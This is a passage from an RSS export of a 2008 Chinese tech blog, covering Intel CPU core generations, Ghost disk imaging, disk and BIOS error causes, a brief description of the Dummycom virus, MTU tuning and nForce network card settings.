<P style="TEXT-INDENT: 2em"><SPAN></SPAN>　　这是目前高端的Pentium 4 EE、主流的Pentium 4和低端的Celeron D所采用的核心。Prescott核心与Northwood核心最大的区别是采用了90nm制造工艺，L1 数据缓存从8KB增加到16KB，流水线结构也从20级增加到了31级，并且开始支持SSE3指令集。Prescott核心CPU初期采用Socket 478接口，现在基本上已经全部转到Socket 775接口，核心电压1.25-1.525V。前端总线频率方面，Celeron D全部都是533MHz FSB，而除了Celeron D之外的其它CPU为533MHz(不支持超线程技术)和800MHz(支持超线程技术)以及最高的1066MHz(支持超线程技术)。二级缓存分别为256KB(Celeron D)、1MB(Socket 478接口的pentium 4以及Socket 775接口的Pentium 4 5XX系列)和2MB(Pentium 4 6XX系列以及Pentium 4 EE)。封装方式采用PPGA(Socket 478)和PLGA(Socket 775)。Prescott核心自从推出以来也在不断的完善和发展，先后加入了硬件防病毒技术Execute Disable Bit(EDB)、节能省电技术Enhanced Intel SpeedStep Technology(EIST)、虚拟化技术Intel Virtualization Technology(Intel VT)以及64位技术EM64T等等，二级缓存也从最初的1MB增加到了2MB。按照Intel的规划，Prescott核心会被Cedar Mill核心取代。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Smithfield</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">&nbsp; &nbsp; 这是Intel公司的第一款双核心处理器的核心类型，于2005年4月发布，基本上可以认为Smithfield核心是简单的将两个Prescott核心松散地耦合在一起的产物，这是基于独立缓存的松散型耦合方案，其优点是技术简单，缺点是性能不够理想。目前Pentium D 8XX系列以及Pentium EE 8XX系列采用此核心。Smithfield核心采用90nm制造工艺，全部采用Socket 775接口，核心电压1.3V左右，封装方式都采用PLGA，都支持硬件防病毒技术EDB和64位技术EM64T，并且除了Pentium D 8X5和Pentium D 820之外都支持节能省电技术EIST。前端总线频率是533MHz(Pentium D 8X5)和800MHz(Pentium D 8X0和Pentium EE 8XX)，主频范围从2.66GHz到3.2GHz(Pentium D)、3.2GHz(Pentium EE)。Pentium EE和Pentium D的最大区别就是Pentium EE支持超线程技术而Pentium D则不支持。Smithfield核心的两个核心分别具有1MB的二级缓存，在CPU内部两个核心是互相隔绝的，其缓存数据的同步是依靠位于主板北桥芯片上的仲裁单元通过前端总线在两个核心之间传输来实现的，所以其数据延迟问题比较严重，性能并不尽如人意。按照Intel的规划，Smithfield核心将会很快被Presler核心取代。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Cedar Mill</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">&nbsp; &nbsp; 这是Pentium 4 6X1系列和Celeron D 3X2/3X6系列采用的核心，从2005末开始出现。其与Prescott核心最大的区别是采用了65nm制造工艺，其它方面则变化不大，基本上可以认为是Prescott核心的65nm制程版本。Cedar Mill核心全部采用Socket 775接口，核心电压1.3V左右，封装方式采用PLGA。其中，Pentium 4全部都为800MHz FSB、2MB二级缓存，都支持超线程技术、硬件防病毒技术EDB、节能省电技术EIST以及64位技术EM64T；而Celeron D则是533MHz FSB、512KB二级缓存，支持硬件防病毒技术EDB和64位技术EM64T，不支持超线程技术以及节能省电技术EIST。Cedar Mill核心也是Intel处理器在NetBurst架构上的最后一款单核心处理器的核心类型，按照Intel的规划，Cedar Mill核心将逐渐被Core架构的Conroe核心所取代。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Presler</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">&nbsp; &nbsp; 这是Pentium D 9XX和Pentium EE 9XX采用的核心，Intel于2005年末推出。基本上可以认为Presler核心是简单的将两个Cedar Mill核心松散地耦合在一起的产物，是基于独立缓存的松散型耦合方案，其优点是技术简单，缺点是性能不够理想。Presler核心采用65nm制造工艺，全部采用Socket 775接口，核心电压1.3V左右，封装方式都采用PLGA，都支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T，并且除了Pentium D 9X5之外都支持虚拟化技术Intel VT。前端总线频率是800MHz(Pentium D)和1066MHz(Pentium EE)。与Smithfield核心类似，Pentium EE和Pentium D的最大区别就是Pentium EE支持超线程技术而Pentium D则不支持，并且两个核心分别具有2MB的二级缓存。在CPU内部两个核心是互相隔绝的，其缓存数据的同步同样是依靠位于主板北桥芯片上的仲裁单元通过前端总线在两个核心之间传输来实现的，所以其数据延迟问题同样比较严重，性能同样并不尽如人意。Presler核心与Smithfield核心相比，除了采用65nm制程、每个核心的二级缓存增加到2MB和增加了对虚拟化技术的支持之外，在技术上几乎没有什么创新，基本上可以认为是Smithfield核心的65nm制程版本。Presler核心也是Intel处理器在NetBurst架构上的最后一款双核心处理器的核心类型，可以说是在NetBurst被抛弃之前的最后绝唱，以后Intel桌面处理器全部转移到Core架构。按照Intel的规划，Presler核心从2006年第三季度开始将逐渐被Core架构的Conroe核心所取代。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Yonah</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">&nbsp; &nbsp; 目前采用Yonah核心CPU的有双核心的Core Duo和单核心的Core Solo，另外Celeron M也采用了此核心，Yonah是Intel于2006年初推出的。这是一种单/双核心处理器的核心类型，其在应用方面的特点是具有很大的灵活性，既可用于桌面平台，也可用于移动平台；既可用于双核心，也可用于单核心。Yonah核心来源于移动平台上大名鼎鼎的处理器Pentium M的优秀架构，具有流水线级数少、执行效率高、性能强大以及功耗低等等优点。Yonah核心采用65nm制造工艺，核心电压依版本不同在1.1V-1.3V左右，封装方式采用PPGA，接口类型是改良了的新版Socket 478接口(与以前台式机的Socket 478并不兼容)。在前端总线频率方面，目前Core Duo和Core Solo都是667MHz，而Yonah核心Celeron M是533MHz。在二级缓存方面，目前Core Duo和Core Solo都是2MB，而即Yonah核心Celeron M是1MB。Yonah核心都支持硬件防病毒技术EDB以及节能省电技术EIST，并且多数型号支持虚拟化技术Intel VT。但其最大的遗憾是不支持64位技术，仅仅只是32位的处理器。值得注意的是，对于双核心的Core Duo而言，其具有的2MB二级缓存在架构上不同于目前所有X86处理器，其它的所有X86处理器都是每个核心独立具有二级缓存，而Core Duo的Yonah核心则是采用了与IBM的多核心处理器类似的缓存方案----两个核心共享2MB的二级缓存！共享式的二级缓存配合Intel的“Smart cache”共享缓存技术，实现了真正意义上的缓存数据同步，大幅度降低了数据延迟，减少了对前端总线的占用。这才是严格意义上的真正的双核心处理器！Yonah核心是共享缓存的紧密型耦合方案，其优点是性能理想，缺点是技术比较复杂。不过，按照Intel的规划，以后Intel各个平台的处理器都将会全部转移到Core架构，Yonah核心其实也只是一个过渡的核心类型，从2006年第三季度开始，其在桌面平台上将会被Conroe核心取代，而在移动平台上则会被Merom核心所取代。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Conroe</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">&nbsp; &nbsp; 这是更新的Intel桌面平台双核心处理器的核心类型，其名称来源于美国德克萨斯州的小城市“Conroe”。Conroe核心于2006年7月27日正式发布，是全新的Core(酷睿)微架构(Core Micro-Architecture)应用在桌面平台上的第一种CPU核心。目前采用此核心的有Core 2 Duo E6x00系列和Core 2 Extreme X6x00系列。与上代采用NetBurst微架构的Pentium D和Pentium EE相比，Conroe核心具有流水线级数少、执行效率高、性能强大以及功耗低等等优点。Conroe核心采用65nm制造工艺，核心电压为1.3V左右，封装方式采用PLGA，接口类型仍然是传统的Socket 775。在前端总线频率方面，目前Core 2 Duo和Core 2 Extreme都是1066MHz，而顶级的Core 2 Extreme将会升级到1333MHz；在一级缓存方面，每个核心都具有32KB的数据缓存和32KB的指令缓存，并且两个核心的一级数据缓存之间可以直接交换数据；在二级缓存方面，Conroe核心都是两个内核共享4MB。Conroe核心都支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T以及虚拟化技术Intel VT。与Yonah核心的缓存机制类似，Conroe核心的二级缓存仍然是两个核心共享，并通过改良了的Intel Advanced Smart Cache(英特尔高级智能高速缓存)共享缓存技术来实现缓存数据的同步。Conroe核心是目前最先进的桌面平台处理器核心，在高性能和低功耗上找到了一个很好的平衡点，全面压倒了目前的所有桌面平台双核心处理器，加之又拥有非常不错的超频能力，确实是目前最强劲的台式机CPU核心。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Allendale</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">&nbsp; &nbsp; 这是与Conroe同时发布的Intel桌面平台双核心处理器的核心类型，其名称来源于美国加利福尼亚州南部的小城市“Allendale”。Allendale核心于2006年7月27日正式发布，仍然基于全新的Core(酷睿)微架构，目前采用此核心的有1066MHz FSB的Core 2 Duo E6x00系列，即将发布的还有800MHz FSB的Core 2 Duo E4x00系列。Allendale核心的二级缓存机制与Conroe核心相同，但共享式二级缓存被削减至2MB。Allendale核心仍然采用65nm制造工艺，核心电压为1.3V左右，封装方式采用PLGA，接口类型仍然是传统的Socket 775，并且仍然支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T以及虚拟化技术Intel VT。除了共享式二级缓存被削减到2MB以及二级缓存是8路64Byte而非Conroe核心的16路64Byte之外，Allendale核心与Conroe核心几乎完全一样，可以说就是Conroe核心的简化版。当然由于二级缓存上的差异，在频率相同的情况下Allendale核心性能会稍逊于Conroe核心。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Merom</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">&nbsp; &nbsp; 这是与Conroe同时发布的Intel移动平台双核心处理器的核心类型，其名称来源于以色列境内约旦河旁边的一个湖泊“Merom”。Merom核心于2006年7月27日正式发布，仍然基于全新的Core(酷睿)微架构，这也是Intel全平台(台式机、笔记本和服务器)处理器首次采用相同的微架构设计，目前采用此核心的有667MHz FSB的Core 2 Duo T7x00系列和Core 2 Duo T5x00系列。与桌面版的Conroe核心类似，Merom核心仍然采用65nm制造工艺，核心电压为1.3V左右，封装方式采用PPGA，接口类型仍然是与Yonah核心Core Duo和Core Solo兼容的改良了的新版Socket 478接口(与以前台式机的Socket 478并不兼容)或Socket 479接口，仍然采用Socket 479插槽。Merom核心同样支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T以及虚拟化技术Intel VT。Merom核心的二级缓存机制也与Conroe核心相同，Core 2 Duo T7x00系列的共享式二级缓存为4MB，而Core 2 Duo T5x00系列的共享式二级缓存为2MB。Merom核心的主要技术特性与Conroe核心几乎完全相同，只是在Conroe核心的基础上利用多种手段加强了功耗控制，使其TDP功耗几乎只有Conroe核心的一半左右，以满足移动平台的节电需求。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/48191094200861510555541</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/48191094200861510555541</guid>
    <pubDate>Tue, 15 Jul 2008 10:55:05 +0800</pubDate>
    <dcterms:modified>2008-07-15T10:56:07+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[一键还原GHOST的用法！]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/48191094200852743035494</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">一键还原GHOST的用法！</P>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">
<TABLE>
<TBODY>
<TR>
<TD>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">朋友,你首先要准备一个DOS启动盘.并设为光盘启动. </P>
<P style="TEXT-INDENT: 2em">然后进入GHOST执行文件夹,执行GHOST8.0,或是8.2,8.3版本.(命令如下:cd ghost(要是在D盘,你就要cd d:\ghost) 回车 ghost8.0 (或是 ghost8.2视你版本而定) 回车 </P>
<P style="TEXT-INDENT: 2em">进入GHOST后,就有图形界面了. </P>
<P style="TEXT-INDENT: 2em">GHOST的操作应用 </P>
<P style="TEXT-INDENT: 2em">GHOST！英文原意为幽灵，是由SYMANTEC公司出品的一种硬盘镜像软件。 </P>
<P style="TEXT-INDENT: 2em">1、硬盘间的复制： </P>
<P style="TEXT-INDENT: 2em">首先将两块硬盘安装在同一个机器上，设好主从状态，在DOS状态下（有些时候，GHOST也可以WIN98下运行，但为了防止意味的情况发生，建议你运行在DOS环境下）运行GHOST，然后选择LOCAL、DISK、TO DISK，此时GHOST就会显示有两个磁盘的情况，然后点击第一个磁盘（原盘），按GHOST提示进行确认，然后再点击第二个磁盘（目标盘），再进行确认之后GHOST就开始复制的工作。屏幕上方将有蓝色进度条显示其进行的状态，一般1G左右的数据在10分钟左右就可以完成。操作此功能，注意的是选择原盘和目标盘时千万不要搞错，如果你选择反了，等到复制完之后你就只能得到两个空盘了。 </P>
<P style="TEXT-INDENT: 2em">对于不同容量的两个硬盘，这个方法只能使用在从小硬盘复制到大硬盘之上，反之则不行。进行复制后的大硬盘，你还可以通过分区软件来将剩余的空间找出来（因为GHOST为将剩余的空间做为空闲处理）。对于其中有坏道的硬盘来说，这种复制操作后，系统运行会变得不稳定，所以要注意。 </P>
<P style="TEXT-INDENT: 2em">2、从硬盘到镜像： </P>
<P style="TEXT-INDENT: 2em">安装两个硬盘在一台机器上，运行GHOST，选择LOCAL DISK TO IMAGE。此时GHOST就会显示两个磁盘的情况，然后选定要备份的硬盘，再选定镜像文件放置在什么位置（往往是第二块硬盘的某一个目录中，目录要事先建立好的！）然后在屏幕下端的提示栏中输入一个名字，比如DISKIMG，再按回车，就可以进行备份的工作了，同样有一个进度条演示进度过程。 </P>
<P style="TEXT-INDENT: 2em">3、通过镜像恢复到硬盘： </P>
<P style="TEXT-INDENT: 2em">1、运行GHOST，然后选择LOCAL DISK FROM IMAGE， </P>
<P style="TEXT-INDENT: 2em">2、再选择你所备份的镜像文件存放在位置，然后指定要恢复的硬盘，确认之后，恢复工具就开始了。 </P>
<P style="TEXT-INDENT: 2em">4、从分区到分区： </P>
<P style="TEXT-INDENT: 2em">有两个不同的硬盘，而只想有相同的系统和工具软件。可以通过GHOST也完成。首先将两块硬盘安装在同一机器上，运行GHOST。选择LOCAL PARTITION TO PARTITION。然后选择原分区、确认后再选择目标分区（第二块硬盘的第一个分区）。完毕之后，你就有两块都可以启动的硬盘了。因为是分区的复制，所以此处要求两个硬盘进行复制的分区必须大小一致，如果不一致，目标盘其它分区将被删除！ </P>
<P style="TEXT-INDENT: 2em">5、从分区到镜像： </P>
<P style="TEXT-INDENT: 2em">执行GHOST．EXE，屏幕上就可以出现GHOST的主界面。选择LOCAL PARTIION TO IMAGE，然后选定硬盘、分区，确认之后，输入一个备份的名字，例如WIN98BAK，然后按回车。 这时屏幕会提示三个选择项，分别是NO，FAST和HIGH。这三种的意思是：NO：备份时不进行压缩处理，所以速度最快，FAST：备份中进行一定的压缩处理，速度比较快。HIGH：备份时压缩，压缩后体积小，但进行速度较慢。这三个选择项可以根据你的爱好来选择。最后确认即可，GHOST就开始了备份的工作。 </P>
<P style="TEXT-INDENT: 2em">6、从镜像恢复分区： </P>
<P style="TEXT-INDENT: 2em">运行GHOST，选择LOCAL PARTITION FROM IMAGE，选定你备份文件的存放位置（GHOST的扩展名为GHO）。然后选定你要恢复的分区（这往往是你硬盘的第一个分区！）确定后，GHOST就开始恢复工作了，几分钟后系统就恢复了。因为GHOST备份时使用的是原有系统，所以建议你备份之前一定要保证系统的完整性、所使用的软件全都完整，清理好回收站，安装好各个设备的驱动程序，再进行备份。另外在恢复备份之前也别忘了备份你近一段时间的重要数据，因为GHOST的镜像中可不包括这些。 </P>
<P style="TEXT-INDENT: 2em">7、检查功能： </P>
<P style="TEXT-INDENT: 2em">GHOST还具有检查功能，以检查你的镜像文件及磁盘的工作状态是否良好，这些功能应用的场合不太多，所以老安也就不多介绍了。 </P>
<P style="TEXT-INDENT: 2em">8、LPT传输功能： </P>
<P style="TEXT-INDENT: 2em">GHOST还可以支持LPT并口的数据传输功能，可以通过并口线方便的连接笔记本电脑和台式机，进行数据的交换！ </P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/48191094200852743035494</comments>
    <slash:comments>1</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/48191094200852743035494</guid>
    <pubDate>Fri, 27 Jun 2008 16:30:35 +0800</pubDate>
    <dcterms:modified>2008-06-27T16:30:35+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[硬盘读写错误 ]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420085255519651</link>
    <description><![CDATA[<div>硬盘读写错误 <BR><BR>hard disk read/write error <BR><BR>这样的原因一般有三： <BR>一：你插入了外接存储设备（如移动硬盘，U盘），这个设备却并不包含引导文件，解决方法就是拔下他们重启动。 <BR>二：硬盘引导数据损坏（你可以理解为操作系统坏了），那只有重装系统或者修复系统。 <BR>三：对你来讲也许不是什么好消息，就是硬盘接触问题，为了测试这个问题，你最好按电源开关关闭电脑后从启动，如果没有问题，你就重新的插一下硬盘的连线；如果还是有问题，那也许是0磁道的损坏，你可以找一个电脑高手帮你用D-bug，DM，pq，kv这类软件修一下。 <BR>如果上述问题仍不能解决你的麻烦，那就是硬盘或电源除了故障，那只有去维修部了 <BR><BR>unknown flash type <BR>1.bios确实不能识别你所使用的flash，可以通过更新bios解决；不过出现unknown flash type后，差不多一定不可以在板再次更新bios，需要通过其他途径（如：别的板热插拔帮你刷新，或是烧录器）。 <BR><BR><BR><BR>2.bios写保护导致，这个是最通常的原因。写保护的方法有2种：硬件调线的方法、GPIO软件控制的方爱猫扑.爱生活哪种方法都是将WE#这个信号搞得高电平无效达到目的。有些板在第一次启动的时候，需要update ESCD 、build DMI等需要对bios进行回写的操作，如果做了保护，出现unknown flash type，导致回写失败。 <BR>这种情况的解决方法，先检查一下板上都有哪些写保护的东西，硬件的、软件的都关掉。一般就不会有什么问题了。</div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420085255519651</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420085255519651</guid>
    <pubDate>Wed, 25 Jun 2008 17:51:09 +0800</pubDate>
    <dcterms:modified>2008-06-25T17:51:09+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[磁碟机病毒(Dummycom)简介]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420085101056653</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">磁碟机病毒(Dummycom)简介</P>
<P style="TEXT-INDENT: 2em">近日，360安全中心截获了一款新的木马病毒，命名为“磁碟机Dummycom”，该木马病毒通过U盘、ARP攻击及网页漏洞等多种方式传播，并会在计算机中的文件反复感染。属于需进行紧急处理的恶性木马病毒，360安全中心独家发布专杀工具.</P>
<P style="TEXT-INDENT: 2em">该程序运行后关闭并阻止360安全卫士和卡巴、瑞星、金山、江民等大家所熟知的安全类软件的运行，除此之外还会删除系统中含有“360”字样的文件。感染病毒后，进程中会出现2个smss.exe和2个lsass.exe进程（如果只一个smss.exe和lsass.exe进程，说明系统正常，并不是磁碟机，请不要惊慌），使用任务管理器结束后会造成计算机重启。</P>
<P style="TEXT-INDENT: 2em">据分析，该病毒使用的关闭安全软件的方法和以往不同，其通过发生一堆垃圾消息，导致安全程序的崩溃，连icesword（冰刃）也未能幸免。其在运行后，会在 system32的Com 目录下生成smss.exe,lsass.exe, netcfg.dll等文件并在system32下生成dsnq.dll文件，在关机瞬间会写一个文件到开始菜单的启动项中；病毒文件名一般为“~.exe”。需要注意的是，该病毒使用极其恶毒的感染方式，导致文件被感染后无法使用且部分文件无法恢复。</P>
<P style="TEXT-INDENT: 2em">360安全专家提醒用户，此类恶性木马病毒需及时使用专杀工具进行查杀。并升级360安全卫士到最新版本，及时修补系统漏洞，进行定期扫描。以避免损失。</P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420085101056653</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420085101056653</guid>
    <pubDate>Tue, 10 Jun 2008 10:56:06 +0800</pubDate>
    <dcterms:modified>2008-06-10T10:56:06+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[网络技术术语MTU是什么意思]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/48191094200842871311980</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">MTU是Maximum Transmission Unit的缩写。意思是网络上传送的最大数据包。MTU的单位是字节。 大部分网络设备的MTU都是1500。如果本机的MTU比网关的MTU大，大的数据包就会被拆开来传送，这样会产生很多数据包碎片，增加丢包率，降低网络速度。把本机的MTU设成比网关的MTU小或相同，就可以减少丢包。 3、如何检测网关的MTU？ 在本机打开dos窗口，执行： ping -f -l 1472 192.168.0.1 其中192.168.0.1是网关IP地址，1472是数据包的长度。请注意，上面的参数是“-l”（小写的L），而不是“-1”。 如果能ping通，表示数据包不需要拆包，可以通过网关发送出去。 如果出现： Packet needs to be fragmented but DF set. 表示数据包需要拆开来发送。此时，减少数据包长度，再执行上面的ping命令。从1400到1472之间多试几次，就能找到合适的数据包长度了。把数据包长度加上数据包头28字节，就得到MTU的值。 如果检测到网关的MTU值是1500，不需要修改。 如果网关有防火墙ping不通，可以试试直接把MTU设为1400。 4、如何修改本机的MTU？ 修改方法如下： （1）、运行regedit （2）、浏览到： HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces 如图2 （3）、Interfaces下有多个子项，每个子项对应一个网卡。请按如下方法选择网卡： （a）确定本机用来连接Internet的网卡或拨号连接的IP，如192.168.0.19； （b）用鼠标点击Interfaces上的子项，查看键值列表中的IPAddress项； （c）如果IPAddress的键值与（a）中的IP相同，即192.168.0.19，则该子项就是要找的网卡。 （4）、进入该子项，在右边的窗口里按鼠标右键，选择“新建”-&gt;“双字节值”，输入名称“MTU”，按回车。再用鼠标双击“MTU”，弹出修改窗口： 如图3： 填入MTU的值。填写前请先把基数设为十进制。 设置好后，需要重启机器才能生效。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/48191094200842871311980</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/48191094200842871311980</guid>
    <pubDate>Wed, 28 May 2008 19:13:11 +0800</pubDate>
    <dcterms:modified>2008-05-28T19:13:11+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[NVIDIA nForce Networking Controller网卡延时]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/481910942008428778247</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">NVIDIA nForce Networking Controller网卡延时</P>
<P style="TEXT-INDENT: 2em">
<TABLE>
<TBODY>
<TR>
<TD>
<P></P>
<P style="TEXT-INDENT: 2em">网盟一贴！</P>
<P style="TEXT-INDENT: 2em">NVIDIA nForce Networking Controller网卡最佳设置...剑侠2..延迟0. 卡位.人物看不到头、看不到人...玩着玩着 自动弹出.. </P>
<P style="TEXT-INDENT: 2em">=======================================</P>
<P style="TEXT-INDENT: 2em">Checksum Offload 设置为 Disable</P>
<P style="TEXT-INDENT: 2em">Flow Control 设置为 Disable</P>
<P style="TEXT-INDENT: 2em">延迟问题解决...玩游戏会不定时弹出..</P>
<P style="TEXT-INDENT: 2em">========================================</P>
<P style="TEXT-INDENT: 2em">ASF Event0 - Boot Failure Enable</P>
<P style="TEXT-INDENT: 2em">ASF Event1 - Fan Problem Enable</P>
<P style="TEXT-INDENT: 2em">ASF Event10 - Case Intrusio Enable</P>
<P style="TEXT-INDENT: 2em">ASF Event4 - Heartbeat Enable</P>
<P style="TEXT-INDENT: 2em">ASF Event6-power button Enable</P>
<P style="TEXT-INDENT: 2em">ASF Event7-System Hot Enable</P>
<P style="TEXT-INDENT: 2em">ASF Event8-CPU Overheate Enable</P>
<P style="TEXT-INDENT: 2em">ASF Heartbeat interval (sec) 600</P>
<P style="TEXT-INDENT: 2em">ASF Managing Station IP add</P>
<P style="TEXT-INDENT: 2em">ASF PET Packet Send Count 1</P>
<P style="TEXT-INDENT: 2em">ASF Support Disable</P>
<P style="TEXT-INDENT: 2em">Checksum Offload Disable</P>
<P style="TEXT-INDENT: 2em">Flow Control Disable</P>
<P style="TEXT-INDENT: 2em">IEEE802.1P Support Disable</P>
<P style="TEXT-INDENT: 2em">Jumbo Frame Payload Size 1500</P>
<P style="TEXT-INDENT: 2em">Low Power State Link Speed Enable</P>
<P style="TEXT-INDENT: 2em">Network Address</P>
<P style="TEXT-INDENT: 2em">Optimize For</P>
<P style="TEXT-INDENT: 2em">Segmentation Offload Enable</P>
<P style="TEXT-INDENT: 2em">Speed/duplex settings</P>
<P style="TEXT-INDENT: 2em">VLAN Id</P>
<P style="TEXT-INDENT: 2em">VLAN Support</P>
<P style="TEXT-INDENT: 2em">Wake on Magic packet</P>
<P style="TEXT-INDENT: 2em">Wake on pattern</P>
<P style="TEXT-INDENT: 2em">WakeOnLAN From PowerOff</P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/481910942008428778247</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/481910942008428778247</guid>
    <pubDate>Wed, 28 May 2008 19:07:08 +0800</pubDate>
    <dcterms:modified>2008-05-28T19:07:08+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[NF网卡在千兆网络中的设置问题]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420084286542946</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">NF网卡在千兆网络中的设置问题</P>
<P style="TEXT-INDENT: 2em">
<TABLE>
<TBODY>
<TR>
<TD>
<P></P>
<P style="TEXT-INDENT: 2em">NF网卡在千兆网络中的设置问题</P>
<P style="TEXT-INDENT: 2em">
<TABLE>
<TBODY>
<TR>
<TD>
<P></P>
<P style="TEXT-INDENT: 2em">这两天研究了一下NF4/NF5的网卡默认设置，发现存在一些问题，需要手动更改才能达到比较好的速度，下面我用Foxconn N5M2AA为例说一下</P>
<P style="TEXT-INDENT: 2em">Checksum Offload&nbsp;&nbsp; 数据包校验 建议关闭</P>
<P style="TEXT-INDENT: 2em">Flow Control&nbsp;&nbsp;&nbsp;&nbsp; 流量控制 一定要关闭</P>
<P style="TEXT-INDENT: 2em">IEEE802.1P Support&nbsp;&nbsp; IEEE802.1P支持 建议关闭</P>
<P style="TEXT-INDENT: 2em">Jumbo Frame Payload Size&nbsp;&nbsp; 默认是1500&nbsp;&nbsp; 这个是千兆网络一个新的设置，在下文详细叙述。</P>
<P style="TEXT-INDENT: 2em">Low Power State Link Speed&nbsp;&nbsp; 网卡节能&nbsp;&nbsp; 建议关闭</P>
<P style="TEXT-INDENT: 2em">Network Address&nbsp;&nbsp;&nbsp;&nbsp; MAC的修改&nbsp;&nbsp; 默认为不存在 一般不必改动</P>
<P style="TEXT-INDENT: 2em">Optimize For&nbsp;&nbsp; CPU/Throughput&nbsp;&nbsp; 为CPU占用优化或为吞吐量进行优化，设置为CPU的话，网卡的速度被限制，但CPU占用会很低，假如改为Throughput的话，网卡的性能才能完全发挥，但CPU的占用也会上升不少。</P>
<P style="TEXT-INDENT: 2em">Segmentation Offload&nbsp;&nbsp; 建议关闭</P>
<P style="TEXT-INDENT: 2em">Speed/Duplex Settings&nbsp;&nbsp; Full Autonegotiation（全自适应，一般不用修改）</P>
<P style="TEXT-INDENT: 2em">VLAN Id&nbsp;&nbsp; 默认是1 不用改</P>
<P style="TEXT-INDENT: 2em">VLAN Support&nbsp;&nbsp; VLAN支持 一般关闭</P>
<P style="TEXT-INDENT: 2em">Wake on Magic packet&nbsp;&nbsp; 魔术数据包唤醒 建议关闭</P>
<P style="TEXT-INDENT: 2em">Wake on pattern&nbsp;&nbsp; 建议关闭</P>
<P style="TEXT-INDENT: 2em">WakeOnLAN From PowerOff&nbsp;&nbsp; 建议关闭</P>
<P style="TEXT-INDENT: 2em">下面讲讲关于Jumbo Frame这个选项，这是一个新的技术，传统来说，标准以太网帧就是 1518 字节，除去 14 字节以太网头和 4 字节 CRC 校验是 1500，正好是 MTU 值，这是为以前的网络环境而考虑的设定大小，但在目前的千兆局域网环境中，各种设备已经十分稳定，所以一些厂家为了提高性能，提出Jumbo Frame这个新技术，但因为这个技术并非网络标准所规定的通讯设定，所以各厂家的产品都有差异，未必能够兼容。</P>
<P style="TEXT-INDENT: 2em">用法的考虑因素</P>
<P style="TEXT-INDENT: 2em">[*]只有在整个网络上的设备都支持“巨帧”且配置为使用相同的帧大小时，才启用“巨帧”。在其他网络设备上设置“巨帧”时，应明白不同的网络设备对“巨帧”大小的计算也不相同。有些设备将数据包头的信息包括在帧大小中，有些不包括。英特尔适配器不将数据包头的信息包括在帧大小中。 </P>
<P style="TEXT-INDENT: 2em">[*]巨帧仅支持 TCP/IP。 </P>
